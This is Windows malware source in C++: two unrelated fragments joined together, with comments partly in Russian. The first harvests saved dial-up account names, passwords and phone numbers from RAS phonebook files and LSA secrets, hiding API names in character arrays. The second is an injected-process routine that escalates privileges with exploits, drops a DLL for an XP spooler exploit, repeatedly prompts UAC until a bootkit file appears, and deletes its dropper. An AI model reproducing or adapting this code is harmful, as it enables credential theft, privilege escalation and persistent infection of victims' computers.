bool CDialupass::GetRasEntries() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; OSVERSIONINFO osi; osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'}; GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05); pGetVersionExA(&osi); if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5) { GetLsaPasswords(); } DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { char *lpRealSection = (char *)UTF8ToGB2312(lpSection); char strDialParamsUID[256]; char strUserName[256]; char strPassWord[256]; char strPhoneNumber[256]; char strDevice[256]; memset(strDialParamsUID, 0, sizeof(strDialParamsUID)); memset(strUserName, 0, sizeof(strUserName)); memset(strPassWord, 0, sizeof(strPassWord)); memset(strPhoneNumber, 0, sizeof(strPhoneNumber)); memset(strDevice, 0, sizeof(strDevice)); char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'}; GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04); int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]); char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'}; lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03); if (nBufferLen > 0)//DialParamsUID=4326020 198064 { for(int j=0; j< (int)m_nRasCount; j++) { if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0) { plstrcpyA(strUserName, m_PassWords[j].login); plstrcpyA(strPassWord, m_PassWords[j].pass); m_PassWords[j].used=true; m_nUsed++; break; } } } pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]); pGetPrivateProfileStringA(lpSection, "Device", 0, strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]); char *lpRealDevice = (char *)UTF8ToGB2312(strDevice); char *lpRealUserName = (char *)UTF8ToGB2312(strUserName); Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord, strPhoneNumber, lpRealDevice); // delete lpRealSection; // delete lpRealUserName; // delete lpRealDevice; } } delete lpszReturnBuffer; return true; }
// Ф-ция, которая вызывается при инжекте в другие процессы. // Проверяет свои права и пробует их расширить для DWORD WINAPI ExplorerRoutine( LPVOID lpData ) { // // Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты. // BOOL bRun = TRUE; BOOL bRet = FALSE; BOOL IsUsedExploit = FALSE; OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0}; UnhookDlls(); BuildImport((PVOID)GetImageBase()); PP_DPRINTF(L"ExplorerRoutine: started"); if (! IsUserAdmin() ) { PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges."); switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun); IsUsedExploit = TRUE; // По идее это всегда TRUE }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet); } /* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */ if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) ) { PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges"); IsUsedExploit = TRUE; switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet); } }; pGetVersionExA(&OSVer); /* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */ if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5)) { PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit"); DWORD DropSize = 0; PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize); if ( DropImage && DropSize) { PCHAR DropFile = File::GetTempNameA(); File::WriteBufferA(DropFile,DropImage,DropSize); SpoolerBypass(DropFile); STR::Free(DropFile); }; }; /* Запуск много раз копии дропера с прошением повышенных прав. */ if ( bRet == FALSE ) { PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle"); PCHAR tmpexe,dir,file ; PCHAR tmp_manifest; PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX"); if ( NamePrefix ) do { tmpexe = File::GetTempNameA(); tmp_manifest = STR::Alloc(MAX_PATH+1); dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ; file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ; if ( tmp_manifest && dir && file) { STR::Free(tmpexe); tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe"); if ( ! tmpexe ) return 0; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest,".manifest"); }; if ( tmpexe && tmp_manifest ) if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) ) { DWORD dwCode = -1; SHELLEXECUTEINFOA ExecInfo; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest," "); m_lstrcat(tmp_manifest,ARGV_UAC_RUN); ExecInfo.cbSize = sizeof(ExecInfo); ExecInfo.lpFile = tmpexe; ExecInfo.lpParameters = tmp_manifest; ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; for ( int i = 0; i < 10; ++i ) { PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest); if ( pShellExecuteExA(&ExecInfo) == FALSE ) break; pWaitForSingleObject(ExecInfo.hProcess,INFINITE); pGetExitCodeProcess(ExecInfo.hProcess,&dwCode); if ( dwCode == 0 ) { PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest); break; } } }; if ( tmpexe ) STR::Free(tmpexe); if ( tmp_manifest ) STR::Free(tmp_manifest); if ( dir ) STR::Free(dir); if ( file ) STR::Free(file); } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита if ( NamePrefix ) STR::Free(NamePrefix); }; /* Если инстал был не удачный снова пробуем вдруг повезет*/ if ( bRet == FALSE) { PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet); } /* Удаляем дропер */ PP_DPRINTF(L"ExplorerRoutine: Start to delete droper"); pCloseHandle(StartThread(DeleteDropper,NULL)); if ( dwExplorerSelf ) { PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()"); pExitProcess(0); } return 0; }